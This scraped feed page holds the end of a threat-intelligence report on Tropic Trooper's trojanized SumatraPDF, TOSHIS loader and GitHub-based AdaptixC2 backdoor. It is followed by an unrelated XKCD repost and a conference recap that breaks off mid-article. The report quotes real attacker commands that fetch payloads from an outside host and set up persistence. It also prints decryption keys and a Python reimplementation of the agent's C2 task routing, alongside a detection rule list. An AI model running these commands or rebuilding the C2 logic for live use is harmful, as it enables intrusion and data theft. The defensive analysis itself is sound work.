TOSHIS loader then retrieves a second-stage shellcode from the same IP address, decrypts it using AES-128 CBC with WinCrypt cryptographic functions, and executes the shellcode directly in-memory. This shellcode is an AdaptixC2 Beacon agent. This marks a departure from earlier TOSHIS versions, which delivered either a Cobalt Strike Beacon or a Merlin Mythic agentANALYST NOTE: The AES key is derived by using the Windows API function CryptDeriveKey with the MD5 hash of a hard-coded key seed “424986c3a4fddcb6”. The initialization vector (IV) is set to 0.An analysis of the InjectedCode function shows that it is largely identical to the TOSHIS loader described in TrendMicro’s TAOTH report. The only notable differences are modifications to the stack strings and the removal of the language ID check. Although this sample resolves the GetSystemDefaultLangID API, the API is never actually invoked. Clear similarities can be observed between the injected code in these two samples, such as the use of the same User-Agent and a similar .dat file extension, as shown in the code examples below.Figure 4: Code comparison of the TOSHIS loader in the backdoored SumatraPDF sample and the TOSHIS loader described in the TAOTH report.Stage 2 – Backdoor: AdaptixC2 Beacon agent integrated with GitHubThe second-stage backdoor employed in this attack is the open-source AdaptixC2 Beacon agent, which incorporates a customized Beacon Listener. 
The table below shows the extracted configuration:OffsetFieldValueConfig Meta0x00Extra field0x6a (106)0x04Profile size156 bytes (encrypted)Decrypted Profile0x08Agent type (wmark)0xbe4c0149GitHub Transport Config0x0CRepo ownercvaS23uchsahs0x1ERepo namerss0x26API hostapi.github.com0x39Auth tokenghp_…0x66Issues API pathrepos/cvaS23uchsahs/rss/issues?state=openTiming Config0x94Kill datedisabled0x98Working timedisabled (always active)0x9CSleep delay60 seconds0xA0Jitter42RC4 Key0xA4RC4 key7adf76418856966effc9ccf8a21d1b12Table 2: Configuration extracted  from a Tropic Trooper AdaptixC2 Beacon agent.The RC4 key in the config above is used to decrypt the encrypted parts of the config, as well as beacon heartbeats. Because the agent is open-source, our focus will be on the custom beacon listener component, which utilizes GitHub as its C2 server. The figure below shows the layout of the GitHub repository used for C2.Figure 5: Layout of the Tropic Trooper GitHub repository used by an AdaptixC2 Beacon.The figure below shows the details of GitHub issues used for C2.Figure 6: Example of GitHub issues used by AdaptixC2.The agent starts by generating a 16-bytes RC4 session key using RtlRandomEx(GetTickCount()) to encrypt all subsequent C2 traffic, which is a standard practice for an AdaptixC2 agent. However, this custom listener differs from the typical AdaptixC2 HTTP/TCP listeners because the server cannot identify the agent’s external IP address since it is using GitHub. As a result, the agent retrieves its external IP address by sending a request to ipinfo.io. This external IP address is then included and sent back to the C2 with every beacon. The agent uses the following HTTP request to retrieve its external IP address from ipinfo.io.GET /ip HTTP/1.1</p><p>User-Agent: curl/8.5.0 // Hardcoded user agent<br> Host: ipinfo.io<br> Cache-Control: no-cacheThe agent then sends a beacon to the C2 by performing a POST request to GitHub Issue #1 to establish a session. 
The beacon follows the standard AdaptixC2 format and contains the RC4 session key and a random 4-byte number used as the agent ID. These values are RC4 encrypted using the key in the agent’s config. Note that the agent ID is regenerated each time the agent is initialized; the agent uses this ID to identify and process commands intended specifically for it. The following figure shows the C2 workflow:</p>
<p>Figure 7: Diagram showing the C2 workflow.</p>
<p>After beaconing, the agent checks for tasks to execute by making the following request:</p>
<p>GET /repos/cvaS23uchsahs/rss/issues?state=open HTTP/1.1</p>
<p>The API returns a JSON list of open issues. The agent uses substring matching, rather than a full JSON parser, to extract the issue number, title, and body fields for each issue. Depending on the issue title, the agent applies different logic to extract the actual task, which is RC4 encrypted using the session key:</p>
<ul>
<li>If the title is “beat”: this is the heartbeat/beacon issue, and the agent skips it.</li>
<li>If the title starts with “upload” and ends with “.txt”: the agent finds the last “_” character in the title, expecting an 8-character hexadecimal agent ID between that “_” and the “.txt” extension. If the extracted ID matches the agent’s own ID, the agent processes the issue; if it does not match, the agent skips it. There are unusual edge cases, however: the agent also processes the issue if the title contains no “_” character at all, or if the extracted ID is shorter than 7 characters. When the agent decides to process the issue, it constructs the contents API URL, for example /repos/{repo_owner}/{repo_name}/contents/upload/{agent_id}/{issue_title}, or concretely /repos/cvaS23uchsahs/rss/contents/upload/c64df0d5/upload_1773341382_c64df0d5.txt. It then retrieves the download URL from the response, again by substring matching, downloads the file from the repository, Base64-decodes its contents, and queues the task for processing.</li>
<li>If the title starts with “fileupload”: the agent Base64-decodes the “body” field and queues the task for processing. This encrypted task contains the path of the file the agent should exfiltrate. Note that there is no agent ID check here, so every agent polling the repository will attempt to execute this task.</li>
<li>If the title does not start with any of the three strings above: the agent Base64-decodes the title and queues it as a command. Again, there is no agent ID check, so every agent attempts to execute this task.</li>
</ul>
<p>The agent then processes all queued tasks. Each task in the queue is decrypted using the RC4 session key and processed according to the standard AdaptixC2 agent procedure.</p>
<p>After processing a task, the agent prepares a response payload with two parts: the encrypted beacon packet sent previously (RC4 encrypted with the key from the agent’s config), and the AdaptixC2 agent data packet encrypted with the session key. The entire buffer is Base64-encoded and uploaded as a file to GitHub. If the buffer is larger than 30MB, it is uploaded in 30MB chunks, each with an incrementing part number.</p>
<p>
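The title-dispatch logic above, as an added example that is not the agent’s own code: a small Python router applies the title rules, including the two permissive edge cases in the “upload” branch, to a constructed list of issues shaped like the GitHub API response. It uses a real JSON parser where the agent uses substring matching, and it stops at queuing the still-encrypted task; RC4 decryption with the session key is not shown, and the task bodies are placeholder bytes. The owner, repository and agent ID values are the ones quoted in the text.

```python
import base64
import binascii
import json

REPO_OWNER = "cvaS23uchsahs"
REPO_NAME = "rss"


def contents_url(agent_id: str, title: str) -> str:
    return f"/repos/{REPO_OWNER}/{REPO_NAME}/contents/upload/{agent_id}/{title}"


def targets_this_agent(title: str, agent_id: str) -> bool:
    """The 'upload_<ts>_<agentid>.txt' check, with the edge cases described in the text."""
    us = title.rfind("_")
    if us == -1:
        return True                      # edge case: no '_' at all -> processed anyway
    extracted = title[us + 1:-len(".txt")]
    if len(extracted) < 7:
        return True                      # edge case: short or empty ID -> processed anyway
    return extracted == agent_id


def safe_b64(text: str):
    try:
        return base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None                      # not Base64: nothing to queue


def route_issue(issue: dict, agent_id: str):
    """Return None to skip the issue, else a dict describing what the agent would queue."""
    title, body = issue.get("title", ""), issue.get("body") or ""
    if title == "beat":
        return None                      # heartbeat issue
    if title.startswith("upload") and title.endswith(".txt"):
        if not targets_this_agent(title, agent_id):
            return None
        return {"kind": "file_task", "issue": issue["number"],
                "fetch": contents_url(agent_id, title)}
    if title.startswith("fileupload"):   # no agent ID check: every agent runs it
        task = safe_b64(body)
        return None if task is None else {"kind": "fileupload", "issue": issue["number"], "task": task}
    task = safe_b64(title)               # bare command, again unscoped to any agent
    return None if task is None else {"kind": "command", "issue": issue["number"], "task": task}


def route_issues(issues_json: str, agent_id: str) -> list:
    return [r for i in json.loads(issues_json) if (r := route_issue(i, agent_id)) is not None]


# Constructed sample of what GET .../issues?state=open returns (only the fields the agent uses).
SAMPLE_ISSUES = json.dumps([
    {"number": 1, "title": "beat", "body": ""},
    {"number": 2, "title": "upload_1773341382_c64df0d5.txt", "body": ""},
    {"number": 3, "title": "upload_1773341382_deadbeef.txt", "body": ""},   # another agent's task
    {"number": 4, "title": "upload.txt", "body": ""},                        # edge case: no '_'
    {"number": 5, "title": "upload_abc.txt", "body": ""},                    # edge case: ID < 7 chars
    {"number": 6, "title": "fileupload", "body": base64.b64encode(b"<rc4 blob>").decode()},
    {"number": 7, "title": base64.b64encode(b"<rc4 blob>").decode(), "body": ""},
])

if __name__ == "__main__":
    for queued in route_issues(SAMPLE_ISSUES, "c64df0d5"):
        print(queued)
```

Run against the sample, the router queues issues 2, 4, 5, 6 and 7 and skips 1 and 3. Issues 4 and 5 show why the edge cases matter: a task file named without a proper ID suffix is picked up by every agent, as are all “fileupload” and bare-command issues, so an operator who posts a single file-exfiltration task collects that path from every infected host that polls the repository.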
An example of an upload request is shown below.</p>
<p>PUT /repos/cvaS23uchsahs/rss/contents/download/fa302eb5/download_1773890673_part1.txt HTTP/1.1<br>
// …<br>
Body: {“message”:”upload”,”content”:”&lt;base64 blob&gt;”}</p>
<p>Once the file is successfully uploaded, the agent adds a comment to the issue that carried the command it is responding to. The “|@@@|” string is used as a separator token, here between the agent ID and the file name, and likewise between multiple file parts when the response was chunked, as shown below.</p>
<p>POST /repos/cvaS23uchsahs/rss/issues/2/comments HTTP/1.1<br>
// …<br>
Body: {“body”:”fa302eb5|@@@|download_1773890673_part1.txt”}</p>
<h2>Stage 3 – Operations and operational security</h2>
<p>By monitoring the C2 communication flow through the GitHub repository, ThreatLabz noticed that beacons are deleted very quickly, often within 10 seconds of being uploaded. This rapid deletion is likely intended to destroy the session keys, preventing observers from decrypting the C2 messages. Note, however, that per the response format described above, every uploaded response file also carries the beacon packet, which embeds the session key under the static config key; an analyst who holds the config key from the sample and captures a response file can therefore still recover the session key.</p>
<p>During our observation of this campaign, ThreatLabz found that the threat actor primarily used the Adaptix agent as an initial foothold for reconnaissance and access. When a victim was deemed “interesting,” the threat actor deployed VS Code and used VS Code tunnels for remote access. 
On some machines, the threat actor installed alternative, trojanized applications, possibly to better camouflage their activity among the applications the victim normally uses.</p>
<p>ThreatLabz observed the threat actor issuing the following commands:</p>
<ul>
<li><code>arp /a</code></li>
<li><code>cd C:\Users\Public\Documents &amp; code tunnel user login --provider github &gt; z.txt</code></li>
<li><code>code tunnel user login --provider github &gt; z.txt</code></li>
<li><code>curl -O http://bashupload[.]app/6e1lhc</code></li>
<li><code>curl -kJL https://code.visualstudio.com/sha/download?build=stable&amp;os=cli-win32-x64 -o %localappdata%\microsoft\windows\Burn\v.zip</code></li>
<li><code>curl -s 'ip.me?t=1&amp;m=2'</code></li>
<li><code>curl http://bashupload[.]app/zgel2a.bin -o v.zip &amp; dir</code></li>
<li><code>curl ip.me?t=1&amp;m=2</code></li>
<li><code>net view \\192.168.220.2</code></li>
<li><code>schtasks /create /tn \MSDNSvc /sc hourly /mo 2 /tr C:\users\public\documents\dsn.exe /f /RL HIGHEST</code></li>
<li><code>schtasks /create /tn \MicrosoftUDN /sc hourly /mo 2 /f /tr C:\Users\Public\Documents\MicrosoftCompilers.exe C:\Users\Public\Documents\2.library-ms</code></li>
<li><code>tasklist | findstr /i note</code></li>
<li><code>tasklist|findstr /i code.exe || code tunnel user login --provider github &gt; z2.txt</code></li>
<li><code>timeout 3 &amp;&amp; schtasks /run /i /tn \MicrosoftUDN</code></li>
<li><code>wmic process where processid=8528 get commandline</code></li>
</ul>
<p>Further monitoring of the staging server, 158.247.193[.]100, revealed that it also hosted the EntryShell backdoor, a custom backdoor known to be used by Tropic Trooper. This sample of EntryShell used the same AES-128 ECB key (afkngaikfaf) as previously reported. The staging server was also found to host a Cobalt Strike Beacon carrying the watermark “520”, another known indicator of Tropic Trooper activity.</p>
<h2>Threat Attribution</h2>
<p>ThreatLabz attributes this attack to Tropic Trooper with high confidence based on the following factors:</p>
<ul>
<li><strong>Use of TOSHIS:</strong> The loader used in this campaign matches the loader identified as TOSHIS in the TAOTH campaign.</li>
<li><strong>Trojanized binaries:</strong> The technique of using trojanized binaries (such as SumatraPDF) as part of the initial infection vector is consistent across both attacks. Specifically, a trojanized SunloginDesktopAgent.exe was observed in this campaign as part of a secondary infection.</li>
<li><strong>Publicly available backdoors:</strong> As in the TAOTH campaign, publicly available backdoors are used as payloads. Where Cobalt Strike Beacon and Mythic Merlin were previously used, the threat actor has now shifted to AdaptixC2.</li>
<li><strong>Use of VS Code:</strong> In both campaigns, the threat actor deployed VS Code to establish a tunnel.</li>
<li><strong>Post-infection commands:</strong> The commands executed in this attack are similar to those reported in the TAOTH campaign, particularly the use of “z.txt” when creating a VS Code tunnel.</li>
<li><strong>Hosting of the EntryShell backdoor:</strong> The EntryShell backdoor, a custom backdoor previously linked to Tropic Trooper, was also used.</li>
<li><strong>Cobalt Strike Beacon:</strong> The Cobalt Strike Beacon with the watermark “520” is a known signature of Tropic Trooper. It also used C2 URIs such as “/Originate/contacts/CX4YJ5JI7RZ”, which were observed in earlier attacks attributed to Tropic Trooper.</li>
</ul>
<h2>Conclusion</h2>
<p>This campaign, attributed to Tropic Trooper, targeted Chinese-speaking individuals in Taiwan as well as individuals in South Korea and Japan. ThreatLabz made this attribution with high confidence based on the threat actor’s use of the TOSHIS loader and similar TTPs. For this campaign, Tropic Trooper deployed an AdaptixC2 Beacon agent that used a custom GitHub-based C2 listener, and went on to deploy VS Code tunnels for remote access.</p>
<h2>Zscaler Coverage</h2>
<p>Zscaler’s multilayered cloud security platform detects indicators related to TOSHIS at various levels. 
The figure below depicts the Zscaler Cloud Sandbox, showing detection details for TOSHIS.</p>
<p>Figure 8: Zscaler Cloud Sandbox report for the TOSHIS loader.</p>
<p>In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to the targeted attacks mentioned in this blog at various levels with the following threat names:</p>
<ul>
<li>Win64.Trojan.TOSHIS</li>
<li>Win32.Backdoor.AdaptixC2</li>
<li>Win32.Backdoor.EntryShell</li>
<li>Win32.Backdoor.CobaltStrike</li>
</ul>
<h2>Indicators Of Compromise (IOCs)</h2>
<p>File indicators:</p>
<table>
<tr><th>MD5</th><th>SHA1</th><th>SHA256</th><th>Filename</th><th>Description</th></tr>
<tr><td>3238d2f6b9ea9825eb61ae5e80e7365c</td><td>2c65433696037f4ce0f8c9a1d78bdd6835c1b94d</td><td>a4f2131eb497afe5f78d8d6e534df2b8d75c5b9b565c3ec17a323afe5355da26</td><td>Unknown</td><td>ZIP archive containing lures and trojanized SumatraPDF</td></tr>
<tr><td>67fcf5c21474d314aa0b27b0ce8befb2</td><td>19e3c4df728e3e657cb9496cd4aaf69648470b63</td><td>47c7ce0e3816647b23bb180725c7233e505f61c35e7776d47fd448009e887857</td><td>资料/美英与美澳核潜艇合作的比较分析(2025).exe</td><td>Trojanized SumatraPDF</td></tr>
<tr><td>89daa54fada8798c5f4e21738c8ea0b4</td><td>bd618c9e1e10891fe666839650fa406833d70afd</td><td>aeec65bac035789073b567753284b64ce0b95bbae62cf79e1479714238af0eb7</td><td>4d.dat</td><td>Encrypted reflective loader shellcode and AdaptixC2 Beacon agent</td></tr>
<tr><td>e2dc48ef24da000b8fc1354fa31ca9ae</td><td>6c68dc2e33780e07596c3c06aa819ea460b3d125</td><td>7a95ce0b5f201d9880a6844a1db69aac7d1a0bf1c88f85989264caf6c82c6001</td><td>N/A</td><td>Decrypted AdaptixC2 Beacon agent DLL</td></tr>
<tr><td>2d7cc3646c287d6355def362916c6d26</td><td>adb47733c224fc8c0f7edc61becb578e560435ab</td><td>3936f522f187f8f67dda3dc88abfd170f6ba873af81fc31bbf1fdbcad1b2a7fb</td><td>1C.dat</td><td>Encrypted Cobalt Strike Beacon loader</td></tr>
<tr><td>71fa755b6ba012e1713c9101c7329f8d</td><td>c2051635ccfdc0b48c260e7ceeee3f96bf026fea</td><td>6eaea92394e115cd6d5bab9ae1c6d088806229aae320e6c519c2d2210dbc94fe</td><td>2C.dat</td><td>Encrypted Cobalt Strike Beacon loader</td></tr>
<tr><td>c620b4671a5715eec0e9f3b93e6532ba</td><td>343be0f2077901ea5b5b9fb97d97892ac1a907e6</td><td>b92a3a1cf5786b6e08643483387b77640cd44f84df1169dd00efde7af46b5714</td><td>N/A</td><td>Decrypted Cobalt Strike Beacon loader</td></tr>
<tr><td>9a69b717ec4e8a35ae595aa6762d3c27</td><td>401cc16d79d94c32da3f66df21d66ffd71603c14</td><td>3c29c72a59133dd9eb23953211129fd8275a11b91a3b8dddb3c6e502b6b63edb</td><td>N/A</td><td>Decrypted Cobalt Strike Beacon loader</td></tr>
</table>
<p>Network indicators:</p>
<table>
<tr><th>Type</th><th>Indicator</th></tr>
<tr><td>IP address</td><td>158.247.193[.]100</td></tr>
<tr><td>URL</td><td>https://api.github.com/repos/cvaS23uchsahs/rss/issues</td></tr>
<tr><td>URL</td><td>https://47.76.236[.]58:4430/Originate/contacts/CX4YJ5JI7RZ</td></tr>
<tr><td>URL</td><td>https://47.76.236[.]58:4430/Divide/developement/GIZWQVCLF</td></tr>
<tr><td>URL</td><td>https://stg.lsmartv[.]com:8443/Originate/contacts/CX4YJ5JI7RZ</td></tr>
<tr><td>URL</td><td>https://stg.lsmartv[.]com:8443/Divide/developement/GIZWQVCLF</td></tr>
</table>
<h2>MITRE ATT&amp;CK Framework</h2>
<table>
<tr><th>ID</th><th>Tactic, Technique</th><th>Description</th></tr>
<tr><td>T1585.003</td><td>Resource Development: Establish Accounts: Cloud Accounts</td><td>The threat actor created the GitHub account cvaS23uchsahs, which hosted the rss repository used for C2 communication.</td></tr>
<tr><td>T1587.001</td><td>Resource Development: Develop Capabilities: Malware</td><td>The threat actor developed a custom listener for the AdaptixC2 Beacon agent that uses the GitHub API for C2 communication. In addition, the threat actor developed their own custom TOSHIS loader.</td></tr>
<tr><td>T1588.001</td><td>Resource Development: Obtain Capabilities: Malware</td><td>The threat actor obtained and deployed the open-source AdaptixC2 Beacon agent as their backdoor.</td></tr>
<tr><td>T1588.002</td><td>Resource Development: Obtain Capabilities: Tool</td><td>The threat actor used VS Code’s tunnel feature for remote access to compromised systems.</td></tr>
<tr><td>T1608.001</td><td>Resource Development: Stage Capabilities: Upload Malware</td><td>The threat actor hosted a second-stage shellcode payload on their server at 158.247.193[.]100, which the initial loader was designed to download and execute.</td></tr>
<tr><td>T1608.002</td><td>Resource Development: Stage Capabilities: Upload Tool</td><td>The threat actor uploaded VS Code to bashupload[.]app, from which it was subsequently downloaded onto victim machines.</td></tr>
<tr><td>T1204.002</td><td>Execution: User Execution: Malicious File</td><td>The attack sequence requires a user to run the malicious file titled “美英与美澳核潜艇合作的比较分析(2025).exe”.</td></tr>
<tr><td>T1106</td><td>Execution: Native API</td><td>The initial loader used WinCrypt cryptographic functions to decrypt a second-stage shellcode. Additionally, it employed the ShellExecuteW API to launch a decoy PDF document.</td></tr>
<tr><td>T1059.003</td><td>Execution: Command and Scripting Interpreter: Windows Command Shell</td><td>The threat actor used the Windows Command Shell to run several commands for reconnaissance (e.g., arp, net view, tasklist) and to use cURL for downloading VS Code.</td></tr>
<tr><td>T1053.005</td><td>Persistence: Scheduled Task/Job: Scheduled Task</td><td>The threat actor created a scheduled task using schtasks /create to execute the AdaptixC2 agent every two hours for persistence.</td></tr>
<tr><td>T1036.001</td><td>Defense Evasion: Masquerading: Invalid Code Signature</td><td>The threat actor used a trojanized SumatraPDF executable that retains the original SumatraPDF signature, although the signature is no longer valid.</td></tr>
<tr><td>T1036.004</td><td>Defense Evasion: Masquerading: Masquerade Task or Service</td><td>The threat actor created scheduled tasks with names intended to blend in with legitimate system tasks, such as \MSDNSvc and \MicrosoftUDN.</td></tr>
<tr><td>T1620</td><td>Defense Evasion: Reflective Code Loading</td><td>The trojanized SumatraPDF loader downloaded a second-stage shellcode from 158.247.193[.]100, which reflectively loads the AdaptixC2 Beacon agent.</td></tr>
<tr><td>T1027.007</td><td>Defense Evasion: Obfuscated Files or Information: Dynamic API Resolution</td><td>The initial loader identified Windows APIs by comparing Adler-32 hashes of their names.</td></tr>
<tr><td>T1027.013</td><td>Defense Evasion: Obfuscated Files or Information: Encrypted/Encoded File</td><td>The initial loader downloaded a second-stage payload and decrypted the shellcode in memory using AES-128.</td></tr>
<tr><td>T1127</td><td>Defense Evasion: Trusted Developer Utilities Proxy Execution</td><td>The threat actor downloaded Roslyn, the open-source .NET compiler, to compile and execute malicious code.</td></tr>
<tr><td>T1016</td><td>Discovery: System Network Configuration Discovery</td><td>The threat actor ran arp /a to retrieve the local ARP table, and the agent sent requests to ipinfo.io to identify the external IP address of compromised machines.</td></tr>
<tr><td>T1005</td><td>Collection: Data from Local System</td><td>The threat actor used the AdaptixC2 Beacon agent’s fileupload feature to exfiltrate files from infected machines.</td></tr>
<tr><td>T1071.001</td><td>Command and Control: Application Layer Protocol: Web Protocols</td><td>The TOSHIS loader downloaded a decoy PDF and a second-stage shellcode payload over HTTP from 158.247.193[.]100. The AdaptixC2 Beacon agent used HTTP/S to communicate with its GitHub C2.</td></tr>
<tr><td>T1102.002</td><td>Command and Control: Web Service: Bidirectional Communication</td><td>The threat actor used GitHub for bidirectional C2 communication.</td></tr>
<tr><td>T1219.001</td><td>Command and Control: Remote Access Tools: IDE Tunneling</td><td>The threat actor deployed VS Code and used its remote tunneling feature for interactive access.</td></tr>
<tr><td>T1105</td><td>Command and Control: Ingress Tool Transfer</td><td>The threat actor used cURL to retrieve tools from external servers onto the compromised system, including a VS Code binary from https://code.visualstudio.com and additional payloads from http://bashupload[.]app.</td></tr>
<tr><td>T1132.001</td><td>Command and Control: Data Encoding: Standard Encoding</td><td>The threat actor used Base64 and RC4 to obscure C2 communications.</td></tr>
<tr><td>T1573.001</td><td>Command and Control: Encrypted Channel: Symmetric Cryptography</td><td>The AdaptixC2 Beacon agent encrypted its C2 traffic using an RC4 session key.</td></tr>
<tr><td>T1573.002</td><td>Command and Control: Encrypted Channel: Asymmetric Cryptography</td><td>The threat actor used the GitHub API for C2, which communicates over HTTPS.</td></tr>
<tr><td>T1567.001</td><td>Exfiltration: Exfiltration Over Web Service: Exfiltration to Code Repository</td><td>The threat actor used the GitHub API to exfiltrate files to a threat actor-controlled code repository.</td></tr>
<tr><td>T1041</td><td>Exfiltration: Exfiltration Over C2 Channel</td><td>The threat actor exfiltrated data over the same channel used for C2 communication.</td></tr>
</table>
<p>
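As an added example that is not from the original post, here is detection logic a defender could run over process-creation events to flag the tradecraft this campaign relies on: VS Code tunnel logins, scheduled tasks whose action lives under C:\Users\Public, curl-based external IP checks and fetches from the bashupload[.]app host, and the reconnaissance chain. The constructed sample mixes the Stage 3 commands above on one host with benign look-alikes on another. Rule names, weights, the threshold and the host names are illustrative choices, not anything the post specifies.

```python
import re
from collections import defaultdict

# Rule set: (name, pattern, weight). Names and weights are illustrative choices.
RULES = [
    ("vscode_tunnel", r"\bcode(\.exe)?\s+tunnel\b", 5),                        # "code tunnel user login ..."
    ("schtasks_public_dir", r"\bschtasks\b.*/create\b.*\\users\\public\\", 4),  # task action under C:\Users\Public
    ("schtasks_highest", r"\bschtasks\b.*/RL\s+HIGHEST\b", 2),
    ("external_ip_check", r"\bcurl\b.*\b(ip\.me|ipinfo\.io)\b", 3),
    ("bashupload_fetch", r"\bcurl\b.*bashupload\[?\.\]?app", 5),               # matches defanged and live forms
    ("vscode_cli_download", r"\bcurl\b.*code\.visualstudio\.com/sha/download", 3),
    ("recon", r"^\s*(arp\s+/a|net\s+view|tasklist\b.*findstr|wmic\s+process\b)", 1),
]
COMPILED = [(name, re.compile(pat, re.I), weight) for name, pat, weight in RULES]


def score_event(cmdline: str):
    """Return (score, [rule names]) for one process command line."""
    hits = [(name, weight) for name, rx, weight in COMPILED if rx.search(cmdline)]
    return sum(weight for _, weight in hits), [name for name, _ in hits]


def triage(events, threshold: int = 8) -> dict:
    """Aggregate per host; return {host: (total, sorted rule names)} for hosts at or above threshold."""
    totals, names = defaultdict(int), defaultdict(set)
    for ev in events:
        score, hit = score_event(ev["cmd"])
        totals[ev["host"]] += score
        names[ev["host"]].update(hit)
    return {h: (t, sorted(names[h])) for h, t in totals.items() if t >= threshold}


# Constructed sample: Stage 3 commands on WS-01, benign look-alikes on WS-02.
SAMPLE_EVENTS = [
    {"host": "WS-01", "cmd": r"arp /a"},
    {"host": "WS-01", "cmd": r"cd C:\Users\Public\Documents & code tunnel user login --provider github > z.txt"},
    {"host": "WS-01", "cmd": r"curl -s 'ip.me?t=1&m=2'"},
    {"host": "WS-01", "cmd": r"curl http://bashupload[.]app/zgel2a.bin -o v.zip & dir"},
    {"host": "WS-01", "cmd": r"schtasks /create /tn \MSDNSvc /sc hourly /mo 2 /tr C:\users\public\documents\dsn.exe /f /RL HIGHEST"},
    {"host": "WS-01", "cmd": r"tasklist|findstr /i code.exe || code tunnel user login --provider github > z2.txt"},
    {"host": "WS-02", "cmd": r"code --version"},
    {"host": "WS-02", "cmd": r"curl -O https://example.com/report.pdf"},
    {"host": "WS-02", "cmd": r"schtasks /query /fo LIST"},
]

if __name__ == "__main__":
    for host, (total, hit) in triage(SAMPLE_EVENTS).items():
        print(f"{host}: score={total} rules={hit}")
```

Per-host aggregation is deliberate: `code tunnel` is legitimate on a developer workstation and `schtasks /create` is everywhere, so a single rule firing is weak evidence, while the combination of a tunnel login, a task pointing into a world-writable directory and an external IP lookup within one host’s history is the pattern worth paging on. Seed the curl rules with the host and domain indicators from the IOC tables, not only the two used here.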
</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.zscaler.com/blogs/feeds/security-research">Security Research | Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Yin Hong Chang (Zscaler)">Yin Hong Chang (Zscaler)</a>. Read the original post at: <a href="https://www.zscaler.com/blogs/security-research/tropic-trooper-pivots-adaptixc2-and-custom-beacon-listener">https://www.zscaler.com/blogs/security-research/tropic-trooper-pivots-adaptixc2-and-custom-beacon-listener</a></p>

Randall Munroe’s XKCD ‘Planets and Bright Stars’

  • None
  • Published date: 2026-04-22 00:00:00

None

<p>The post <a href="https://xkcd.com/3219/">Randall Munroe’s XKCD 'Planets and Bright Stars'</a> appeared first on <a href="https://www.infosecurity.us/">Infosecurity.US</a>.</p><figure class=" sqs-block-image-figure intrinsic "><p><img src="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b8b8c37c-ab4d-4455-a4a0-bba738653f5a/planets_and_bright_stars.png?format=1000w" width="374" height="265" alt=""></p><figcaption class="image-caption-wrapper"><p><strong>via the comic artistry and dry wit of Randall Munroe, creator of XKCD</strong></p></figcaption></figure><p><a href="https://www.infosecurity.us/blog/2026/4/22/randall-munroes-xkcd-planets-and-bright-stars-1">Permalink</a></p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.infosecurity.us/">Infosecurity.US</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Marc Handelman">Marc Handelman</a>. Read the original post at: <a href="https://xkcd.com/3219/">https://xkcd.com/3219/</a></p>

SnowFROC 2026: Secure Defaults, Real Trust, and a Better Layer on Top

  • Dwayne McDaniel
  • Published date: 2026-04-22 00:00:00

None

<p>The post <a href="https://blog.gitguardian.com/snowfroc-2026/">SnowFROC 2026: Secure Defaults, Real Trust, and a Better Layer on Top</a> appeared first on <a href="https://blog.gitguardian.com/">GitGuardian Blog – Take Control of Your Secrets Security</a>.</p><p><img decoding="async" src="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/SnowFROCimage.png" alt="SnowFROC 2026: Secure Defaults, Real Trust, and a Better Layer on Top"></p><p>Denver likes a good origin story. The city still keeps a marker for <a href="https://visitdenver.com/blog/post/cheeseburger-birthplace/?ref=blog.gitguardian.com"><u>Louis Ballast and the Humpty Dumpty Barrel, the local spot tied to the cheeseburger’s Colorado claim</u></a>. That detail felt oddly right for <a href="https://snowfroc.com/?ref=blog.gitguardian.com"><u>SnowFROC 2026</u></a>. A cheeseburger is a small upgrade that changes the whole meal. This year’s conference kept returning to the same idea in AppSec: meaningful security progress often comes from well-placed layers that make the better choice easier to make. </p><p>The Snow in "SnowFROC" is due to the time of year the event takes place and the good possibility that it will snow, <a href="https://bsky.app/profile/mdwayne-real.bsky.social/post/3mjplq47s4m2x?ref=blog.gitguardian.com"><u>which it did this year</u></a>. The other half of the name stands for Front Range OWASP Conference. This year, the organizers expanded it into a two-day event in Denver that drew about 400 attendees for 35 sessions, 8 half-day training sessions, a CTF, and multiple village activities. The room carried that blend of practical curiosity and sharp hallway conversation that makes any security conference worth the trip. 
</p><p>Throughout the event, the sessions covered how software is actually built now: fast, AI-assisted, dependency-heavy, and spread across more people and systems than any one security team can fully monitor alone. The strongest sessions focused on incentives, workflows, trust boundaries, and the places where attackers keep finding leverage because defenders still leave too much to intent, memory, and good luck.</p><p>Here are just a few notes from SnowFROC 2026.</p><h2 id="the-human-layer-in-secure-defaults"><strong>The Human Layer in Secure Defaults</strong></h2><p>In her keynote, "Threat Modeling Developer Behavior: The Psychology of Bad Code," <a href="https://ca.linkedin.com/in/tanya-janca?ref=blog.gitguardian.com"><u>Tanya Janca, founder of She Hacks Purple Consulting</u></a>, explained that in AppSec, insecure code is rarely just a technical failure. It is usually a human one. Developers work under pressure, chase deadlines, respond to incentives, and fall back on habits, biases, and shortcuts that feel reasonable in the moment. Instead of telling people they are wrong and expecting better outcomes, AppSec teams need to understand why those choices happen in the first place. Psychology helps explain the gap between what teams say they value and what their systems actually reward.</p><p>Tanya talked about intervention and prevention over blame. Secure defaults beat secure intent because they remove friction and make the safer path the easier one. That can look like pre-commit hooks, IDE nudges, secure-by-default templates, and frequent reminders placed where decisions actually happen, not buried in a wiki. The same logic applies to training. Annual compliance sessions and lists of what not to do rarely change behavior. Teaching secure patterns, explaining the why behind them, and reinforcing them in small daily ways is far more likely to stick. The goal is not more nagging. 
It is better environmental design.</p><p>Tanya shared her experiences of AI-assisted coding triggering automation bias, where people trust confident suggestions too quickly. Tight deadlines push present bias, making future breach risk feel abstract next to immediate shipping pressure. Copying code from forums, skipping tests, ignoring warnings, avoiding documentation, or showing off with clever code all follow similar patterns. </p><p>She asked us all to build systems that reward maintainable, tested, secure work and to measure what actually matters, including time to fix, adoption of secure patterns, and real vulnerability reduction. If teams want secure coding to be real, they have to make it the path of least resistance.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img decoding="async" src="https://storage.ghost.io/c/42/5d/425d266f-cf99-406e-9436-597a19bed011/content/images/2026/04/data-src-image-9b8dc1df-9ed9-4d7b-8e9d-fa969e3d8d20.png" class="kg-image" alt="SnowFROC 2026: Secure Defaults, Real Trust, and a Better Layer on Top" loading="lazy" width="1000" height="753"><figcaption><span style="white-space: pre-wrap;">Tanya Janca</span></figcaption></figure><h2 